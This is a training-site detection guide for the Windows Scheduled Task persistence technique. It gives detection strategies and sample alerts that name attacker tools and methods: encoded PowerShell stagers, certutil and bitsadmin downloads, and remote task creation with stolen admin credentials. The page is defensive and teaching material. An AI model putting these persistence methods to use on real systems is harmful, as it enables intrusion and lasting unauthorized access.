Scheduled Task (T1053.005) is a MITRE ATT&CK technique in the Persistence tactic. SOC analysts detect it by monitoring for XDR, SIEM events, behavioral anomalies, and the specific indicators described in this detection guide. Practice detection in SOCSimulator Operations.
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility interacts with the Task Scheduler from the command-line. The Task Scheduler can also be opened through the GUI within the System Tools section of the Management Console. The Task Scheduler allows the execution of programs on system startup, on a scheduled basis, or based on event triggers. Many legitimate applications use the Task Scheduler for routine maintenance, updates, and housekeeping. This makes distinguishing malicious scheduled tasks from legitimate ones challenging without examining the command being executed, the account under which the task runs, and whether the creation of the task was authorized through change management processes. Attackers often name tasks to mimic legitimate Windows tasks and use encoded commands to obscure the true nature of the scheduled action.
“Scheduled Task is documented as technique T1053.005 in the MITRE ATT&CK knowledge base under the Persistence tactic. Detection requires visibility into XDR, SIEM telemetry.”
The following detection strategies help SOC analysts identify Scheduled Task activity. These methods apply across XDR, SIEM environments and can be implemented as detection rules, correlation queries, or behavioral analytics in your security platform.
Examine newly created scheduled task XML definitions for tasks using Base64-encoded PowerShell commands, tasks executing from temporary directories, and tasks configured to run with SYSTEM or elevated account credentials without a business justification.
Monitor Windows Event ID 4698 for scheduled task creation and Event ID 4702 for modification, correlating with the creating process and user account to identify tasks created through unusual means such as via mshta.exe or office applications.
Detect scheduled tasks created to run at logon or system startup from non-standard paths such as user AppData directories, temporary folders, or ProgramData subdirectories not associated with known software products.
Alert on scheduled tasks that download content from the internet during execution, using command lines containing PowerShell Invoke-WebRequest, certutil download flags, or bitsadmin transfer jobs embedded within the task action.
Implement baseline comparison for scheduled tasks on server and workstation images, alerting on any tasks present in the environment that do not appear in the approved baseline configuration for that system type.
These realistic alert examples show what Scheduled Task looks like in your security tools. Use them to tune detection rules and train analysts to recognize true positives versus false positives in live environments.
Windows Event 4698 recorded creation of scheduled task "MicrosoftEdgeUpdateTaskMachineUA" via schtasks.exe on workstation WS-MKTG-044. Despite the legitimate-sounding name, the task action executes powershell.exe with -EncodedCommand containing a Base64 string that decodes to a Cobalt Strike stager. The task is configured to run at system startup under the SYSTEM account.
Remote scheduled task created on file server FILE-SRV-03 from an external workstation using at.exe with domain administrator credentials. The task executes a batch script uploaded to the ADMIN$ share that installs a backdoor service. Remote task creation combined with the use of domain admin credentials from a non-administrative workstation indicates compromised privileged credentials being leveraged for lateral movement.
Scheduled task triggered and executed certutil.exe to download an executable file disguised as a certificate from an external CDN. The task fires every 4 hours and the downloaded payload is immediately executed. This recurring download mechanism ensures the attacker can push updated payloads and maintains persistence even if the initially deployed malware is detected and removed between task execution cycles.
SOCSimulator provides hands-on training rooms where you investigate real-world attack scenarios including Scheduled Task. Build detection skills with zero consequences — free forever.
Persistence refers to techniques adversaries use to maintain access across reboots, credential changes, and other disrup…
Read more GlossaryEndpoint Detection and Response (EDR) is a security technology that continuously monitors endpoint activity, recording p…
Read more GlossaryThreat hunting is the proactive, human-led process of searching through security telemetry to find hidden threats that e…
Read more GlossaryAn Indicator of Compromise (IOC) is an observable artifact, such as a file hash, IP address, domain name, URL, registry …
Read more Career PathThreat Hunters do not wait for alerts. You develop hypotheses based on threat intelligence and adversary behavior models…
Read more Career PathDetection Engineers build the rules, analytics, and automated workflows that determine what the SOC can see. You transla…
Read more ToolThe XDR console in SOCSimulator replicates the investigation workflow of platforms like CrowdStrike Falcon, Microsoft De…
Read more ToolThe SIEM console in SOCSimulator replicates the workflow of enterprise platforms like Splunk Enterprise Security, Micros…
Read more ComparisonSOCSimulator wins on operational realism. You get multi-tool shift simulation with SLA pressure, noise injection, and al…
Read more ComparisonSOCSimulator is the better tool for dedicated SOC analyst preparation. TryHackMe is the better tool for broad cybersecur…
Read more GlossaryComplete glossary of Security Operations Center terminology for aspiring SOC analysts.
Read more FeaturePractice alert triage under realistic time pressure with SLA timers and noise injection.
Read moreWe use cookies to improve your experience and measure usage. Learn more